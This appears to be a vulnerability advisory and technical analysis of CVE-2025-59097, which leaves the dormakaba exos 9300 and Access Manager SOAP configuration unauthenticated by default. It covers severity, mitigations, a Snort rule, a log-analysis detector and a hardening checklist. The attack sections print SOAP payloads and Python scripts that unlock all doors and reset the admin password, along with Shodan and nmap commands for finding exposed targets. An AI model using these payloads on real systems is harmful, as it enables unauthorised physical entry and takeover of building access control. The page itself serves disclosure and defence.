Description
The exos 9300 application can be used to configure Access Managers (e.g. 92xx, 9230 and 9290). The configuration is done in a graphical user interface on the dormakaba exos server. As soon as the save button is clicked in exos 9300, the whole configuration is sent to the selected Access Manager via SOAP. The SOAP request is sent without any prior authentication or authorization by default. Though authentication and authorization can be configured using IPsec for 92xx-K5 devices and mTLS for 92xx-K7 devices, it is not enabled by default and must therefore be activated with additional steps. This insecure default allows an attacker with network level access to completely control the whole environment. An attacker is for example easily able to conduct the following tasks without prior authentication:
- Re-configure Access Managers (e.g. remove alarming system requirements)
- Freely re-configure the inputs and outputs
- Open all connected doors permanently
- Open all doors for a defined time interval
- Change the admin password
- and many more

Network level access can be gained due to insufficient network segmentation as well as missing LAN firewalls. Devices with an insecure configuration have been identified to be directly exposed to the internet.

EPSS Score: 0%
Comprehensive Technical Analysis of EUVD-2025-206361 (CVE-2025-59097)
Vulnerability in dormakaba exos 9300 & Access Manager Configuration Interface
1. Vulnerability Assessment & Severity Evaluation
Core Vulnerability
The dormakaba exos 9300 application, used for configuring Access Managers (92xx series), transmits sensitive configuration data via SOAP (Simple Object Access Protocol) without default authentication or authorization. While IPsec (for 92xx-K5) and mTLS (for 92xx-K7) can be manually enabled, these security controls are disabled by default, leaving systems exposed to unauthenticated remote attacks.
CVSS v4.0 Severity Breakdown
| Metric | Value | Explanation |
|---|---|---|
| Attack Vector (AV) | Network (N) | Exploitable remotely over the network. |
| Attack Complexity (AC) | Low (L) | No special conditions required; straightforward exploitation. |
| Attack Requirements (AT) | None (N) | No user interaction or prior access needed. |
| Privileges Required (PR) | None (N) | No authentication required. |
| User Interaction (UI) | None (N) | No victim interaction needed. |
| Confidentiality (VC) | High (H) | Full access to sensitive configuration data. |
| Integrity (VI) | High (H) | Unauthorized modifications to security-critical settings. |
| Availability (VA) | High (H) | Complete control over physical access systems. |
| Subsequent Confidentiality (SC) | None (N) | No further data exfiltration beyond initial access. |
| Subsequent Integrity (SI) | None (N) | No cascading integrity impacts. |
| Subsequent Availability (SA) | None (N) | No further availability impacts beyond initial compromise. |
Base Score: 9.3 (Critical)

The vulnerability is trivially exploitable with severe impact, allowing full administrative control over physical access systems. The lack of default security controls and the presence of internet-exposed instances significantly increase the risk.
2. Potential Attack Vectors & Exploitation Methods
Primary Attack Vectors
- Unauthenticated SOAP Request Injection
  - Attackers can craft malicious SOAP requests to modify configurations without authentication.
  - Example Exploit Flow:
    - Step 1: Identify exposed exos 9300 or Access Manager instances via Shodan, Censys, or masscan.
    - Step 2: Intercept or replay SOAP requests (e.g., via Burp Suite, Wireshark, or custom scripts).
    - Step 3: Modify configuration payloads to:
      - Disable alarms (e.g., tamper detection, forced entry alerts).
      - Unlock all doors permanently (e.g., by setting DoorLockState=0).
      - Change admin credentials (e.g., via the SetAdminPassword SOAP action).
      - Reconfigure I/O mappings (e.g., disable door sensors).
- Man-in-the-Middle (MitM) Attacks
  - If TLS is not enforced, attackers can intercept and modify SOAP traffic in transit.
  - Tools: mitmproxy, Bettercap, or custom Python scripts using scapy.
- Network Pivoting & Lateral Movement
  - If network segmentation is weak, attackers can:
    - Move laterally from compromised IT systems to OT (Operational Technology) networks.
    - Exploit misconfigured VLANs or default credentials on adjacent devices.
- Internet-Exposed Instances
  - Shodan queries (e.g., title:"exos 9300", port:80,443,8080) reveal publicly accessible instances.
  - Example Search: shodan search "dormakaba exos" --fields ip_str,port,org
Exploitation Tools & Techniques
- SOAP API Fuzzing:
  - SoapUI, Postman, or custom Python scripts to test for unauthenticated endpoints.
  - Example Payload (Door Unlock):

```xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:exos="http://dormakaba.com/exos">
  <soapenv:Header/>
  <soapenv:Body>
    <exos:SetDoorLockState>
      <DoorID>1</DoorID>
      <LockState>0</LockState> <!-- 0 = Unlocked -->
    </exos:SetDoorLockState>
  </soapenv:Body>
</soapenv:Envelope>
```

- Automated Exploitation:
  - Metasploit module (if developed) or custom exploit scripts in Python (requests, zeep).
  - Example Python Exploit:

```python
import requests

target = "http://<TARGET_IP>:8080/exos/soap"
headers = {"Content-Type": "text/xml"}
payload = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:exos="http://dormakaba.com/exos">
  <soapenv:Header/>
  <soapenv:Body>
    <exos:SetAdminPassword>
      <NewPassword>hacked123</NewPassword>
    </exos:SetAdminPassword>
  </soapenv:Body>
</soapenv:Envelope>"""

response = requests.post(target, headers=headers, data=payload)
print(response.text)
```
3. Affected Systems & Software Versions
Vulnerable Products
| Product | Affected Versions | Mitigation Status |
|---|---|---|
| Access Manager 92xx-K5 | All versions | No patch available; requires manual IPsec configuration. |
| Access Manager 92xx-K7 | Older than BAME 06.00 | Must enable mTLS manually; no default security. |
| exos 9300 | All versions | No authentication by default; requires hardening. |
Scope of Impact
- Physical Access Control Systems (PACS) in:
  - Critical Infrastructure (airports, data centers, government facilities).
  - Corporate Offices (high-security buildings).
  - Healthcare & Education (hospitals, universities).
- Internet-exposed instances increase the risk of remote exploitation.
4. Recommended Mitigation Strategies
Immediate Actions (Short-Term)
- Network Segmentation & Firewall Rules
  - Isolate Access Managers in a dedicated VLAN with strict firewall rules.
  - Block inbound SOAP traffic (TCP 80, 443, 8080) from untrusted networks.
  - Example Firewall Rule (iptables):

```bash
iptables -A INPUT -p tcp --dport 8080 -s 192.168.1.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 8080 -j DROP
```

- Enable Authentication & Encryption
  - For 92xx-K5: Configure IPsec (IKEv2 with AES-256).
  - For 92xx-K7: Enable mTLS (mutual TLS with client certificates).
  - Disable unauthenticated SOAP access via exos 9300 settings.
- Disable Internet Exposure
  - Remove public-facing Access Managers from the internet.
  - Use VPN or Zero Trust Network Access (ZTNA) for remote management.
- Monitor & Log SOAP Traffic
  - Deploy IDS/IPS (e.g., Snort, Suricata) to detect unauthorized SOAP requests.
  - Example Snort Rule:

```
alert tcp any any -> $ACCESS_MANAGERS 8080 (msg:"Unauthenticated SOAP Request"; flow:to_server,established; content:"<soapenv:Envelope"; nocase; sid:1000001; rev:1;)
```

  - Legitimate configuration pushes from the exos server carry the same SOAP envelope, so this rule also fires on every save in exos 9300. Exclude the exos server's address from the source (e.g., !$EXOS_SERVER in place of the first any) so that only unexpected senders raise alerts.

Long-Term Remediation (Strategic)
- Vendor Patch & Firmware Updates
  - Upgrade 92xx-K7 to BAME 06.00+ (if available).
  - Request dormakaba to enforce authentication by default in future releases.
- Zero Trust Architecture (ZTA) Implementation
  - Enforce least-privilege access for exos 9300 and Access Managers.
  - Implement continuous authentication (e.g., OAuth 2.0, SAML).
- Regular Security Audits & Penetration Testing
  - Conduct SOAP API security assessments (e.g., OWASP ZAP, Burp Suite).
  - Perform red team exercises to test physical access control resilience.
- Incident Response Planning
  - Develop playbooks for unauthorized access attempts.
  - Isolate compromised Access Managers to prevent lateral movement.
5. Impact on European Cybersecurity Landscape
Regulatory & Compliance Risks
- NIS2 Directive (EU 2022/2555):
  - Critical infrastructure operators (e.g., airports, energy, healthcare) must secure PACS.
  - Failure to mitigate may result in fines up to €10M or 2% of global turnover.
- GDPR (EU 2016/679):
  - Unauthorized physical access could lead to data breaches, triggering GDPR reporting obligations.
- ENISA Guidelines:
  - Lack of default security violates ENISA's "Secure by Default" principles.
Threat Landscape Implications
- Increased Attack Surface for APTs & Cybercriminals
  - State-sponsored actors (e.g., APT29, Sandworm) may exploit this for espionage or sabotage.
  - Ransomware groups (e.g., LockBit, BlackCat) could lock physical access systems for extortion.
- Supply Chain Risks
  - Third-party integrators (e.g., security contractors) may misconfigure systems, increasing exposure.
- Physical Security Convergence Risks
  - Cyber-physical attacks (e.g., unauthorized door access) could lead to theft, sabotage, or terrorism.
Geopolitical & Economic Impact
- Critical Infrastructure at Risk
  - Airports, power plants, and government buildings using dormakaba systems are high-value targets.
- Economic Disruption
  - Unauthorized access could lead to shutdowns, theft, or operational halts.
- Reputation Damage
  - Public disclosure of vulnerabilities may erode trust in dormakaba and European PACS vendors.
6. Technical Details for Security Professionals
SOAP API Analysis
- Endpoint: http://<TARGET_IP>:8080/exos/soap
- WSDL Discovery:
  - Example Request: curl -X GET http://<TARGET_IP>:8080/exos/soap?wsdl
- Key Operations:

| SOAP Action | Description | Security Risk |
|---|---|---|
| SetDoorLockState | Unlocks/locks doors | Physical access control bypass |
| SetAdminPassword | Changes admin credentials | Privilege escalation |
| ConfigureAlarm | Disables/enables alarms | Tampering detection evasion |
| GetSystemConfig | Retrieves full configuration | Information disclosure |

Exploitation Proof of Concept (PoC)
- Identify Target: nmap -p 80,443,8080 --script http-title <TARGET_IP>
- Intercept SOAP Traffic (Burp Suite):
  - Configure Burp Proxy to intercept HTTP POST requests to /exos/soap.
- Modify & Replay Requests:
  - Example (Unlock All Doors):

```xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:exos="http://dormakaba.com/exos">
  <soapenv:Header/>
  <soapenv:Body>
    <exos:SetDoorLockState>
      <DoorID>*</DoorID> <!-- Wildcard for all doors -->
      <LockState>0</LockState>
    </exos:SetDoorLockState>
  </soapenv:Body>
</soapenv:Envelope>
```

- Automate with Python:

```python
import requests
from zeep import Client

wsdl = "http://<TARGET_IP>:8080/exos/soap?wsdl"
client = Client(wsdl)
response = client.service.SetDoorLockState(DoorID="*", LockState=0)
print(response)
```
Detection & Forensics
- Log Analysis:
  - Check for unusual SOAP requests in exos 9300 logs.
  - Example Log Entry (Malicious):

```
[2026-01-26 12:34:56] INFO: SOAP Request from 192.168.1.100 - Action: SetDoorLockState, DoorID: *, LockState: 0
```

- Network Forensics:
  - PCAP Analysis (Wireshark):
    - Filter: tcp.port == 8080 && http.request.method == "POST"
    - Look for unauthenticated SOAP envelopes.
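The log review described above, as an added example that is not part of the original page or of any dormakaba tooling: it parses log lines in the format quoted above, treats any SOAP request that does not come from the exos server as suspicious (since no other host should push configuration), and separately flags wildcard door unlocks, admin password changes and alarm deactivation. The sample lines, the trusted-source address and the ConfigureAlarm "Enabled" field are constructed assumptions.

```python
import ipaddress
import re

# Constructed sample lines in the log format quoted above. The addresses, the
# trusted-source list and the ConfigureAlarm "Enabled" field are assumptions.
SAMPLE_LOG = """\
[2026-01-26 08:00:01] INFO: SOAP Request from 192.168.1.10 - Action: GetSystemConfig
[2026-01-26 08:05:12] INFO: SOAP Request from 192.168.1.10 - Action: SetDoorLockState, DoorID: 3, LockState: 1
[2026-01-26 12:34:56] INFO: SOAP Request from 192.168.1.100 - Action: SetDoorLockState, DoorID: *, LockState: 0
[2026-01-26 12:35:02] INFO: SOAP Request from 10.0.0.7 - Action: SetAdminPassword
[2026-01-26 12:36:40] INFO: SOAP Request from 192.168.1.10 - Action: ConfigureAlarm, Enabled: 0
"""

TRUSTED_SOURCES = [ipaddress.ip_network("192.168.1.10/32")]  # only the exos 9300 server pushes config

LINE_RE = re.compile(r"^\[(?P<ts>[^\]]+)\] \w+: SOAP Request from (?P<src>[\d.]+)"
                     r" - Action: (?P<action>\w+)(?:, (?P<params>.*))?$")


def parse_line(line):
    # Returns {"ts", "src", "action", "params"} or None for lines that are not SOAP entries.
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    params = {k.strip(): v.strip() for k, _, v in
              (kv.partition(":") for kv in (m.group("params") or "").split(",")) if k}
    return {"ts": m.group("ts"), "src": m.group("src"),
            "action": m.group("action"), "params": params}


def classify(event):
    # Returns the reasons an event should be alerted on; an empty list means benign.
    reasons, p = [], event["params"]
    if not any(ipaddress.ip_address(event["src"]) in net for net in TRUSTED_SOURCES):
        reasons.append("soap_from_untrusted_host")  # nothing but exos 9300 should speak SOAP here
    if event["action"] == "SetDoorLockState" and p.get("DoorID") == "*" and p.get("LockState") == "0":
        reasons.append("mass_unlock")  # wildcard unlock of every door, as in the log entry above
    if event["action"] == "SetAdminPassword":
        reasons.append("admin_credential_change")
    if event["action"] == "ConfigureAlarm" and p.get("Enabled") == "0":
        reasons.append("alarm_disabled")  # review even when the sender is the trusted exos server
    return reasons


def analyze(log_text):
    # One alert dict (event fields plus "reasons") per line that matches at least one rule.
    events = filter(None, map(parse_line, log_text.splitlines()))
    return [{**e, "reasons": r} for e in events if (r := classify(e))]
```

Feed the function the exos 9300 log instead of SAMPLE_LOG and forward the returned alerts to the SIEM named in the hardening checklist; legitimate saves from the exos server produce no alert unless they disable an alarm.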
Hardening Checklist
| Control | Implementation | Verification |
|---|---|---|
| Network Segmentation | Isolate Access Managers in a dedicated VLAN. | nmap -sn <VLAN_SUBNET> |
| Firewall Rules | Block inbound SOAP traffic from untrusted networks. | iptables -L -n |
| IPsec/mTLS | Enable for 92xx-K5/K7. | Check IKEv2/mTLS handshake logs. |
| SOAP Authentication | Enforce HTTP Basic Auth or API keys. | Test with curl -u user:pass. |
| Logging & Monitoring | Enable SIEM integration (e.g., Splunk, ELK). | Check SOAP request logs. |
| Firmware Updates | Apply latest BAME 06.00+ for 92xx-K7. | exos --version |
Conclusion & Recommendations
Key Takeaways
- EUVD-2025-206361 (CVE-2025-59097) is a critical vulnerability due to lack of default authentication in dormakaba exos 9300 & Access Managers.
- Exploitation is trivial and can lead to full physical access control compromise.
- Internet-exposed instances significantly increase attack surface.
Immediate Actions for Organizations
- Isolate vulnerable systems from untrusted networks.
- Enable IPsec/mTLS where supported.
- Monitor for unauthorized SOAP requests.
- Plan for firmware updates and long-term Zero Trust adoption.
Vendor & Regulatory Recommendations
- dormakaba should:
  - Enforce authentication by default in future releases.
  - Provide automated hardening guides for customers.
- ENISA & NIS2 Regulators should:
  - Mandate secure-by-default configurations for PACS.
  - Conduct audits of critical infrastructure using dormakaba systems.
Final Risk Assessment
| Factor | Risk Level | Justification |
|---|---|---|
| Exploitability | Critical | No authentication required; internet-exposed instances. |
| Impact | Critical | Full control over physical access systems. |
| Likelihood | High | Active scanning & exploitation by threat actors. |
| Mitigation Feasibility | Medium | Requires manual configuration; no patch available. |
Overall Risk: CRITICAL (9.3/10)

Organizations must act immediately to prevent unauthorized access to physical security systems.